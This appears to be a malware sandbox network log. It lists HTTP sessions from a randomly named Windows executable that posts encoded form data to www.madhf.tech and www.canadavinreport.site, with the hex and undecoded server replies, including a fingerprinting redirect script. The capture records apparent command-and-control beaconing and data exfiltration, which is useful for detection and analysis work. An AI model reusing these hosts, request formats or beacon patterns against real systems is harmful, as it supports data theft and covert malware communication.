TMo0=pvJQl;aZ[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[Z*kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS\|lglvE)oNfg9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P\|q8?WnrSH+px2]WZ^>%fWxV\o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	65510	103.224.182.242	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:49:55.248200893 CET	1660	OUT	POST /0mwe/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 1240 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.madhf.tech Origin: http://www.madhf.tech Referer: http://www.madhf.tech/0mwe/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 32 6e 49 3d 46 34 58 73 73 64 63 57 39 64 59 6d 56 33 45 6d 74 39 72 6d 57 47 71 50 39 4a 4d 30 4f 68 49 4d 7a 4b 53 71 52 70 72 7a 48 4e 43 39 49 30 4a 68 63 64 4c 56 69 4f 69 58 76 79 7a 56 76 6a 31 66 45 39 67 6e 45 44 70 4c 5a 65 45 61 79 6c 5a 57 4a 65 35 4f 33 76 6c 6c 63 5a 50 59 6f 66 44 57 61 50 36 6d 6b 62 30 38 79 68 46 45 38 4f 70 48 46 44 74 46 6f 76 39 39 46 67 64 36 79 6a 48 38 63 4d 47 31 2b 6c 4b 79 68 44 76 77 4a 52 4a 7a 57 67 6d 67 50 78 32 43 33 4c 63 6f 59 55 33 47 4e 58 64 74 6f 50 68 32 51 45 79 6d 31 32 76 35 61 44 65 48 66 44 35 71 49 55 4f 76 63 38 33 4a 79 6a 6b 5a 31 66 58 4d 46 2f 54 47 79 38 75 49 38 38 44 41 64 30 77 2b 38 50 67 33 59 42 69 71 62 77 45 72 30 39 32 31 4e 67 74 75 4a 56 47 59 69 66 56 33 57 69 56 55 35 4e 54 78 52 34 4d 45 38 6a 66 45 59 4e 54 39 74 2b 4f 36 41 2b 6b 5a 61 2f 57 48 54 62 69 4e 4d 67 45 4b 78 51 4d 48 57 65 63 43 70 52 51 55 72 55 34 36 51 41 47 57 75 4c 30 77 61 2b 6c 50 61 57 6e 68 6b 79 54 6b 4b 4e 37 4f 51 50 64 6a 41 77 69 65 46 48 [TRUNCATED] Data Ascii: 2nI=F4XssdcW9dYmV3Emt9rmWGqP9JM0OhIMzKSqRprzHNC9I0JhcdLViOiXvyzVvj1fE9gnEDpLZeEaylZWJe5O3vllcZPYofDWaP6mkb08yhFE8OpHFDtFov99Fgd6yjH8cMG1+lKyhDvwJRJzWgmgPx2C3LcoYU3GNXdtoPh2QEym12v5aDeHfD5qIUOvc83JyjkZ1fXMF/TGy8uI88DAd0w+8Pg3YBiqbwEr0921NgtuJVGYifV3WiVU5NTxR4ME8jfEYNT9t+O6A+kZa/WHTbiNMgEKxQMHWecCpRQUrU46QAGWuL0wa+lPaWnhkyTkKN7OQPdjAwieFHkd5Ge16QeoyP6i/p0T08QcXOpHlEDICQvJ70yIoMp/0wFvGmMhiruaRdSFy5qVpmNxeM3u4+JOvHZ4juzC7zPOrp173Yu19Gtyz1lycKhnkctJjtURxKTLVSn1OtKs4UAePRIv7FA28CVtaAB1icCzT6TTdwGs+dbLy9AldXFPlUpqXM/Kio8kKtgkFZGscJe+3BY3EZbYAs9SUGnD8FRPq4kY0m54r4UD5jDrB3emy4N6c/CMp4yC+6kAHQz/DZjXhSRhpGu0WLqZqi8vPWTQs05KewGgtuzO9j3su8Az4P2x6+xI+szdByE5LSPaQXSk03mno5EgoNrLDn23CN+BqPEzCjElMZ7QRKXaeqXtAbLRLBcQuHX1LkATxrEgWaeOOhcVinVH2CkHkoOLTFy11+XkSap3vfbBngDkJ2Kl/LcypV8s6TCtFX73XOfjclWOy86KvRmuNlaWYPm8G+Zhhzc44/NdcZWR+s4PyCVWaBVBsmcaStBxXEuppD/U4BcbVgm7X/YTGwLQDgK5vdsGqi/7cekukD8JQcpyVkV0oMKxn7rj8dhEeQFQg3UoQpvjtjYjfhFdYJdO1rWAxEdng+UAkgdYAGpEXQ08OVSPnya+wl4BQaLlEOWgyJ9NayqKOaR6bRb+wxNlNjJV+o5Q+g33+605SEye [TRUNCATED]
Jan 10, 2025 22:49:55.848948956 CET	871	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 21:49:55 GMT server: Apache set-cookie: __tad=1736545795.6790754; expires=Mon, 08-Jan-2035 21:49:55 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 576 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED] Data Ascii: TMo0=pvJQl;aZ[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[Z*kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS\|lglvE)oNfg9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P\|q8?WnrSH+px2]WZ^>%fWxV\o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	65511	103.224.182.242	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:49:57.792543888 CET	368	OUT	GET /0mwe/?2nI=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN45JDeb7ji4WvSMSl4p5VjB9j7uxKBUhToKF7GDp/0AaWeg==&knE=vl8DPVdxl HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.madhf.tech User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 10, 2025 22:49:58.393254995 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 21:49:58 GMT server: Apache set-cookie: __tad=1736545798.8578466; expires=Mon, 08-Jan-2035 21:49:58 GMT; Max-Age=315360000 vary: Accept-Encoding content-length: 1505 content-type: text/html; charset=UTF-8 connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 30 6d 77 65 2f 3f 32 6e 49 3d 49 36 2f 4d 76 6f 73 49 31 4d 34 47 58 6e 41 43 37 62 53 59 47 46 71 72 78 59 64 67 4a 54 4e 65 39 74 6d 6b 45 73 7a 7a 52 74 4f 57 49 77 52 63 49 76 58 73 30 35 48 61 33 6a 58 59 6f 51 70 78 64 59 35 68 42 30 46 57 51 4d 31 56 7a 56 46 73 4a 62 56 4e 34 35 4a 44 65 62 37 6a 69 34 57 76 53 4d 53 6c 34 70 35 56 6a 42 39 6a 37 75 78 4b 42 55 68 54 6f 4b 46 37 47 44 70 2f 30 41 61 57 65 67 3d 3d 26 6b 6e 45 3d 76 [TRUNCATED] Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/0mwe/?2nI=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN45JDeb7ji4WvSMSl4p5VjB9j7uxKBUhToKF7GDp/0AaWeg==&knE=vl8DPVdxl&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ff
Jan 10, 2025 22:49:58.393275976 CET	541	IN	Data Raw: 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 30 Data Ascii: ffff" text="#000000"><div style='display: none;'><a href='http://www.madhf.tech/0mwe/?2nI=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN45JDeb7ji4WvSMSl4p5VjB9j7uxKBUhToKF7GDp/0AaWeg==&knE=vl8DPVdxl&fp=-3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	65514	185.27.134.206	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:50:03.546703100 CET	653	OUT	POST /g3h7/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 204 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.canadavinreport.site Origin: http://www.canadavinreport.site Referer: http://www.canadavinreport.site/g3h7/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 32 6e 49 3d 51 77 43 32 39 6c 67 76 46 79 30 64 58 5a 4a 63 73 69 6f 65 6b 4e 69 68 5a 54 5a 61 36 39 71 76 77 7a 54 66 53 76 59 42 69 65 55 70 47 65 64 46 2b 41 76 71 44 78 47 41 66 4f 64 45 48 54 5a 38 71 79 77 51 62 4c 4d 6e 4f 67 6d 7a 4f 56 72 41 6a 78 49 75 4f 73 4d 77 4f 76 75 63 4a 64 6a 6f 42 78 72 4b 54 66 56 75 55 44 31 57 79 32 38 33 4a 53 66 75 5a 59 41 41 47 41 30 32 4a 59 73 47 7a 36 67 56 4e 5a 65 46 65 59 45 43 46 30 34 44 4a 4b 5a 6e 42 2b 72 64 47 55 6f 42 6e 4a 4c 53 69 42 75 2f 56 67 47 6c 74 61 43 64 6f 59 2b 6b 55 6b 4a 64 56 59 54 37 74 34 7a 55 4d 7a 6e 76 4b 59 49 46 4a 58 51 3d Data Ascii: 2nI=QwC29lgvFy0dXZJcsioekNihZTZa69qvwzTfSvYBieUpGedF+AvqDxGAfOdEHTZ8qywQbLMnOgmzOVrAjxIuOsMwOvucJdjoBxrKTfVuUD1Wy283JSfuZYAAGA02JYsGz6gVNZeFeYECF04DJKZnB+rdGUoBnJLSiBu/VgGltaCdoY+kUkJdVYT7t4zUMznvKYIFJXQ=
Jan 10, 2025 22:50:04.137619972 CET	683	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 21:50:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Content-Encoding: br Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 d3 74 39 ad 1c b5 70 c1 12 27 79 52 f3 a9 bf 55 d1 77 ed c0 39 51 27 3a d5 c8 06 df 2c 39 71 c0 13 2e 8f ba d1 4f 78 d5 39 3c fd e7 26 d0 b5 0b 89 41 90 53 12 98 e6 a4 87 5a 8d 01 7e 52 71 3c c3 24 53 6e 41 fb 0b 08 9a 16 bb b1 50 be e9 4b 59 4e 30 72 16 81 05 38 e5 e4 e7 77 6d f3 90 61 01 a5 88 75 70 10 e4 ca b8 74 e0 b0 a4 2d 8e 72 84 fe 21 ee bb ff 2e 12 4f 6e 1b a0 03 5c 2b 56 7e 7e 63 2b 23 29 67 8d 96 75 fd fc dc 0a b1 bf f4 f7 f4 1f 26 73 29 af e7 73 b5 bb f4 e1 2b c3 3c 76 12 42 ec 25 af 7d cb be 6f 7b ed c3 10 b9 50 06 51 de d8 4f ff 7d 09 39 ac 20 44 e1 c5 51 01 0d 82 28 1f 76 39 1b 12 fa 1f 6f 4f 49 80 fe 03 fa 3c cb b4 12 96 0b 15 45 b1 4d 45 5e 9a 3c c9 0a 61 75 26 b8 4e 21 c2 3a e6 b5 28 93 34 35 b1 73 ae cc 4d 22 44 5a 0a 9e 89 38 2b 33 9d 0a 5f f2 06 32 8f bd 88 3c d7 69 9e 72 61 54 9a 14 42 44 9a 73 a3 62 5f 18 97 3a dd e2 da 4e cc b4 d1 15 c0 94 84 bf bf 4b b7 58 4a 18 22 0d 09 ec fc f5 fd 07 b5 ce cc 77 d3 65 60 70 8c 15 d6 08 85 b0 06 cc fc 50 b6 bb [TRUNCATED] Data Ascii: 1b98 t9p'yRUw9Q':,9q.Ox9<&ASZ~Rq<$SnAPKYN0r8wmaupt-r!.On\+V~~c+#)gu&s)s+<vB%}o{PQO}9 DQ(v9oOI<EME^<au&N!:(45sM"DZ8+3_2<iraTBDsb_:NKXJ"we`pP+9CIeUv;.Gjr"v1)oY''#X{^br`/teG@SK$j+#R*C30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	65515	185.27.134.206	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:50:06.089970112 CET	673	OUT	POST /g3h7/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 224 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.canadavinreport.site Origin: http://www.canadavinreport.site Referer: http://www.canadavinreport.site/g3h7/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 32 6e 49 3d 51 77 43 32 39 6c 67 76 46 79 30 64 46 70 35 63 74 46 38 65 69 74 69 6d 46 44 5a 61 77 64 71 72 77 7a 58 66 53 74 30 52 69 73 41 70 48 39 4a 46 73 52 76 71 45 78 47 41 48 2b 64 64 44 54 59 2b 71 79 38 75 62 4c 67 6e 4f 67 79 7a 4f 56 62 41 6a 47 38 76 55 63 4d 79 47 50 75 65 48 39 6a 6f 42 78 72 4b 54 66 52 45 55 44 74 57 79 48 4d 33 4a 7a 66 74 48 49 41 44 42 41 30 32 43 34 73 61 7a 36 67 33 4e 62 71 76 65 61 38 43 46 30 6f 44 4a 66 74 6f 55 4f 72 62 43 55 70 33 76 38 75 37 6a 57 75 42 4a 77 54 44 72 64 69 44 67 4f 50 4f 4f 47 42 62 57 59 37 51 74 37 62 69 4a 45 36 48 51 37 59 31 58 41 48 48 78 55 36 31 4c 75 42 6b 76 4b 65 6c 42 49 53 42 6f 32 56 4a Data Ascii: 2nI=QwC29lgvFy0dFp5ctF8eitimFDZawdqrwzXfSt0RisApH9JFsRvqExGAH+ddDTY+qy8ubLgnOgyzOVbAjG8vUcMyGPueH9joBxrKTfREUDtWyHM3JzftHIADBA02C4saz6g3Nbqvea8CF0oDJftoUOrbCUp3v8u7jWuBJwTDrdiDgOPOOGBbWY7Qt7biJE6HQ7Y1XAHHxU61LuBkvKelBISBo2VJ
Jan 10, 2025 22:50:06.711913109 CET	683	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 21:50:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Content-Encoding: br Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 d3 74 39 ad 1c b5 70 c1 12 27 79 52 f3 a9 bf 55 d1 77 ed c0 39 51 27 3a d5 c8 06 df 2c 39 71 c0 13 2e 8f ba d1 4f 78 d5 39 3c fd e7 26 d0 b5 0b 89 41 90 53 12 98 e6 a4 87 5a 8d 01 7e 52 71 3c c3 24 53 6e 41 fb 0b 08 9a 16 bb b1 50 be e9 4b 59 4e 30 72 16 81 05 38 e5 e4 e7 77 6d f3 90 61 01 a5 88 75 70 10 e4 ca b8 74 e0 b0 a4 2d 8e 72 84 fe 21 ee bb ff 2e 12 4f 6e 1b a0 03 5c 2b 56 7e 7e 63 2b 23 29 67 8d 96 75 fd fc dc 0a b1 bf f4 f7 f4 1f 26 73 29 af e7 73 b5 bb f4 e1 2b c3 3c 76 12 42 ec 25 af 7d cb be 6f 7b ed c3 10 b9 50 06 51 de d8 4f ff 7d 09 39 ac 20 44 e1 c5 51 01 0d 82 28 1f 76 39 1b 12 fa 1f 6f 4f 49 80 fe 03 fa 3c cb b4 12 96 0b 15 45 b1 4d 45 5e 9a 3c c9 0a 61 75 26 b8 4e 21 c2 3a e6 b5 28 93 34 35 b1 73 ae cc 4d 22 44 5a 0a 9e 89 38 2b 33 9d 0a 5f f2 06 32 8f bd 88 3c d7 69 9e 72 61 54 9a 14 42 44 9a 73 a3 62 5f 18 97 3a dd e2 da 4e cc b4 d1 15 c0 94 84 bf bf 4b b7 58 4a 18 22 0d 09 ec fc f5 fd 07 b5 ce cc 77 d3 65 60 70 8c 15 d6 08 85 b0 06 cc fc 50 b6 bb [TRUNCATED] Data Ascii: 1b98 t9p'yRUw9Q':,9q.Ox9<&ASZ~Rq<$SnAPKYN0r8wmaupt-r!.On\+V~~c+#)gu&s)s+<vB%}o{PQO}9 DQ(v9oOI<EME^<au&N!:(45sM"DZ8+3_2<iraTBDsb_:NKXJ"we`pP+9CIeUv;.Gjr"v1)oY''#X{^br`/teG@SK$j+#R*C30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	65516	185.27.134.206	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:50:08.665330887 CET	1690	OUT	POST /g3h7/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 1240 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.canadavinreport.site Origin: http://www.canadavinreport.site Referer: http://www.canadavinreport.site/g3h7/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 32 6e 49 3d 51 77 43 32 39 6c 67 76 46 79 30 64 46 70 35 63 74 46 38 65 69 74 69 6d 46 44 5a 61 77 64 71 72 77 7a 58 66 53 74 30 52 69 73 34 70 47 50 52 46 2b 69 33 71 46 78 47 41 5a 4f 64 41 44 54 59 2f 71 79 30 71 62 4c 63 64 4f 6b 43 7a 50 30 37 41 6c 30 55 76 61 73 4d 79 4b 76 75 44 4a 64 6a 48 42 77 48 47 54 66 42 45 55 44 74 57 79 45 6b 33 4c 69 66 74 46 49 41 41 47 41 30 36 4a 59 73 6d 7a 36 34 4e 4e 59 47 56 65 75 41 43 45 51 30 44 4c 74 31 6f 57 75 72 5a 50 30 70 2f 76 38 71 67 6a 51 4b 4e 4a 77 6d 6d 72 62 53 44 71 50 53 33 63 33 45 41 46 6f 72 5a 71 59 62 2b 46 6c 36 6f 56 61 45 68 55 42 6a 67 2b 42 57 68 4d 66 46 51 6a 72 66 72 61 4a 53 41 71 79 35 41 7a 72 32 6b 55 66 65 4e 57 52 57 48 59 63 6a 67 58 75 79 74 73 36 52 52 56 72 73 70 63 2f 31 6d 53 44 48 66 59 64 75 6b 6c 76 65 53 50 61 62 39 7a 71 45 79 54 62 59 67 46 44 37 6f 69 43 79 55 4b 47 5a 30 35 38 54 47 66 73 51 36 4b 32 6d 61 6c 68 34 78 38 6a 2f 64 62 2f 45 4f 51 44 4f 4e 54 79 43 36 66 70 44 79 57 63 74 65 63 63 47 57 4c 6e [TRUNCATED] Data Ascii: 2nI=QwC29lgvFy0dFp5ctF8eitimFDZawdqrwzXfSt0Ris4pGPRF+i3qFxGAZOdADTY/qy0qbLcdOkCzP07Al0UvasMyKvuDJdjHBwHGTfBEUDtWyEk3LiftFIAAGA06JYsmz64NNYGVeuACEQ0DLt1oWurZP0p/v8qgjQKNJwmmrbSDqPS3c3EAForZqYb+Fl6oVaEhUBjg+BWhMfFQjrfraJSAqy5Azr2kUfeNWRWHYcjgXuyts6RRVrspc/1mSDHfYduklveSPab9zqEyTbYgFD7oiCyUKGZ058TGfsQ6K2malh4x8j/db/EOQDONTyC6fpDyWcteccGWLn99W6SQBuSXYcuxX40SaoH7rO+y2iOCnrRdWE+QxftWDhP/wF/ntsztKSbHDyRd5JqSD1ShNm1YInQ9fhPblz0fqBOSnm0kGENQp04DvM2GNnEEtJ1YgVJ8swGzS0XpZs3CEq5NLkDp+wyXJWy+VSgR7N/XnvxoLxlJ4GL1oeGLJzIDhUbK0M4gvdvY91p+iSnu+Q/b1L5ltzzSrmAef7fVNFRMNzcxb05W89gL1nm4CyO/UDysER+M6qNOUvXcVMVdmzy7CSnIgmUOu8A5TCRshRbL7DkMU5zj2Qbhsq3UuzuECNosvH52B3KPDzc3SUElzqNFzufcqa1rdrSBeoM/NZPkColUiXf4WkxepdX6LC6f2+FxAHtxo3VgNJyiU7qFDxirPHK6azlRWxnfYamWn1UcUMlY0PqtEwKGqxZchth3glUdns92FKXUcAsLTo4AWXlM8H4F3oP/bkRlxXvDCd3VApKiGDHqBsDThzRch/laI7kFqq4ETEXokRp+dvnud9ybEYrp/0JeGDb4G+grA0+yrC4ruikP2jnbuDtJwaoKvRwMzqKa2lOqViIrwXxVoKyuFtlrWEx31tXk5kbgwqoECuxYdnL71EjkWHEpfbT9V+QTUr0Kk3VFvyUP+2n/53GkC6zyOpP0nOJ9cGvVKlYw2LtYW7gR [TRUNCATED]
Jan 10, 2025 22:50:09.271588087 CET	683	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 21:50:09 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Content-Encoding: br Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 d3 74 39 ad 1c b5 70 c1 12 27 79 52 f3 a9 bf 55 d1 77 ed c0 39 51 27 3a d5 c8 06 df 2c 39 71 c0 13 2e 8f ba d1 4f 78 d5 39 3c fd e7 26 d0 b5 0b 89 41 90 53 12 98 e6 a4 87 5a 8d 01 7e 52 71 3c c3 24 53 6e 41 fb 0b 08 9a 16 bb b1 50 be e9 4b 59 4e 30 72 16 81 05 38 e5 e4 e7 77 6d f3 90 61 01 a5 88 75 70 10 e4 ca b8 74 e0 b0 a4 2d 8e 72 84 fe 21 ee bb ff 2e 12 4f 6e 1b a0 03 5c 2b 56 7e 7e 63 2b 23 29 67 8d 96 75 fd fc dc 0a b1 bf f4 f7 f4 1f 26 73 29 af e7 73 b5 bb f4 e1 2b c3 3c 76 12 42 ec 25 af 7d cb be 6f 7b ed c3 10 b9 50 06 51 de d8 4f ff 7d 09 39 ac 20 44 e1 c5 51 01 0d 82 28 1f 76 39 1b 12 fa 1f 6f 4f 49 80 fe 03 fa 3c cb b4 12 96 0b 15 45 b1 4d 45 5e 9a 3c c9 0a 61 75 26 b8 4e 21 c2 3a e6 b5 28 93 34 35 b1 73 ae cc 4d 22 44 5a 0a 9e 89 38 2b 33 9d 0a 5f f2 06 32 8f bd 88 3c d7 69 9e 72 61 54 9a 14 42 44 9a 73 a3 62 5f 18 97 3a dd e2 da 4e cc b4 d1 15 c0 94 84 bf bf 4b b7 58 4a 18 22 0d 09 ec fc f5 fd 07 b5 ce cc 77 d3 65 60 70 8c 15 d6 08 85 b0 06 cc fc 50 b6 bb [TRUNCATED] Data Ascii: 1b98 t9p'yRUw9Q':,9q.Ox9<&ASZ~Rq<$SnAPKYN0r8wmaupt-r!.On\+V~~c+#)gu&s)s+<vB%}o{PQO}9 DQ(v9oOI<EME^<au&N!:(45sM"DZ8+3_2<iraTBDsb_:NKXJ"we`pP+9CIeUv;.Gjr"v1)oY''#X{^br`/teG@SK$j+#R*C30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	65517	185.27.134.206	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:50:11.272500038 CET	378	OUT	GET /g3h7/?2nI=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRvMsWNScFLLtPX2xNM4zETNmxHASFhTRGutFERc3E41rkQ==&knE=vl8DPVdxl HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.canadavinreport.site User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 10, 2025 22:50:11.879751921 CET	1192	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 21:50:11 GMT Content-Type: text/html Content-Length: 991 Connection: close Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 